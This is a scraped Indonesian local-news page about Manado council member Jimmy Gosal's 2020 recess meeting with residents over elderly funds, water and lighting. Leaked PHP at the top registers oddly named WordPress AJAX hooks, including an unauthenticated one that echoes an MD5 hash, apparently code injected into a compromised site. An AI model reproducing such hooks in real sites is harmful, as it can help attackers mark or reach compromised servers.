function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Jimmy Gosal ‘Banjir’ Aspirasi di Reses Kedua Tahun 2020 – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 12 Agu 2020 21:53 WIB ·

Jimmy Gosal ‘Banjir’ Aspirasi di Reses Kedua Tahun 2020


					Jimmy Gosal ‘Banjir’ Aspirasi di Reses Kedua Tahun 2020 Perbesar

MANADO – Reses kedua tahun 2020 anggota DPRD Kota Manado Jimmy Gosal SH.MH dibanjiri berbagai aspirasi dari warga seputar Kecamatan Wanea, Rabu (12/8/2020).

Menurut laporan hasil reses yang tercatat oleh staff DPRD Kota Manado, aspirasi warga seperti dana lansia, pemasangan baliho calon pemimpin daerah, kelangkaan air bersih, penerangan jalan, serta infrastruktur menjadi topik aspirasi reses yang berlokasi di Kelurahan Teling Atas, Kampung baru.

“Ini semua adalah hal yang paling sering dikeluhkan warga. Ada yang bilang pembagian dana lansia itu tidak merata dan keluhan lain-lain, sudah menjadi makanan sehari-hari anggota dewan,” kata Jimmy Gosal.

Namun dirinya mengatakan, tetap aspirasi ini tetap di serukan kepada pemerintah kota setiap ada kesempatan untuk berdiskusi.

“Di rapat paripurna, anggota dewan berkesempatan menyampaikan suaranya dengan dasar keluhan dan aspirasi dari warga yang didengar langsung oleh wali kota dan kepala SKPD. Seharusnya itu menjadi catatan penting bagi mereka sebagai pengguna anggaran. Jangan hanya memilih aspirasi mana yang diprioritaskan berdasarkan warga partai dari wali kota,”. Ujarnya.

Diketahui hadir juga dalam reses, Anggota DPRD Sulut Richard Sualang, tokoh agama, tokoh masyarakat, serta masyarakat. (Auddy Manoppo)

Artikel ini telah dibaca 1 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized